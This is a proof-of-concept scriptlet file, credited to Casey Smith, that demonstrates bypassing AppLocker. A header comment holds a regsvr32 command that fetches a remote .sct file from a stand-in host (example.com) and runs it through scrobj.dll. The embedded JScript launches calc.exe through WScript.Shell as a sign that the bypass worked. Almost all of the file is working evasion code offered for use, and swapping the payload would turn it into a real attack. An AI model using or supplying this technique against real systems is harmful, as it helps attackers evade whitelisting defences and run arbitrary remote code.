<!-- execute : regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll -->
<!-- if a calc.exe is executed that means you have succesfully bypass apllocker. -->
<!--   -->

<!-- Proof Of Concept - Casey Smith @subTee -->

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
 
</script>
</registration>
</scriptlet>
